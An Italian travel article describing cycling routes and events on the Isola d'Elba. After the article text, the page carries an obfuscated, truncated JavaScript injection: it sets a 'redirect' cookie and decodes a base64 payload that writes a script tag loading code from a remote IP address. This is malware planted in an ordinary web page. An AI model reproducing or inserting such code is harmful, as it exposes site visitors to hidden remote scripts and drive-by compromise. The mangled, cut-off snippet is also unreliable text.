I percorsi più belli da fare in bici sull’Isola d’Elba
Territorio prevalentemente pianeggiante ma non privo di avversità e sfide, coste frastagliate ed entroterra ombrosi, altimetrie diversificate e sentieri stimolanti, numerosi centri di assistenza fanno dell’Isola d’Elba uno dei luoghi perfetti per pedalare. Andare in bici all’Elba soddisfa ciclisti di qualsiasi livello ed esperienza, perché dà la possibilità di muoversi in rilassanti pedalate oppure, per chi è più preparato, sfidarsi in traversate e competizioni.
Gli itinerari in bici all’Elba sono moltissimi: potete approfittarne per visitare un borgo antico oppure attraversare la macchia, potete utilizzare la bicicletta all’Elba per raggiungere una caletta solitaria senza problemi di traffico o di parcheggio. Numerose strade e sentieri sono a disposizione per muoversi agevolmente dal cuore dell’Isola alle coste solitarie, inoltrandosi tra ambienti suggestivi pieni di profumi aromatici e colori.
Ecologica, salutare e divertente, la bici all’Isola d’Elba può essere veramente la soluzione ottimale per godersi tutta la bellezza di questo territorio. Un paio di consigli: la Primavera e l’Autunno sono i periodi migliori per fare quest’esperienza, mentre nei mesi di Luglio ed Agosto fa eccessivamente caldo; studiatevi un tour ad anello con soste nei punti più interessanti e scegliete percorsi in base al mezzo che utilizzate ed al vostro livello di preparazione fisica.
Per gli agonisti che vengono all’Elba in bici da corsa, da non perdere è il Capoliveri Bike Park, un’area di 220 km² di superficie attraversata da oltre 100 km di sentieri pedalabili ed a Settembre il percorso in bici Elbaman, 180 km lungo l’anello occidentale dell’Isola, parte integrante di uno degli eventi di triathlon più importanti al mondo.
Per i nostalgici vale la pena una visita alla Fonte di Coppi sulla strada da Rio nell’Elba a Porto Azzurro dove il campione veniva ad allenarsi. In Primavera potreste approfittare della scusa della bici per partecipare alla Magnalonga, la manifestazione a tappe con 6 km di stand enogastronomici locali. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘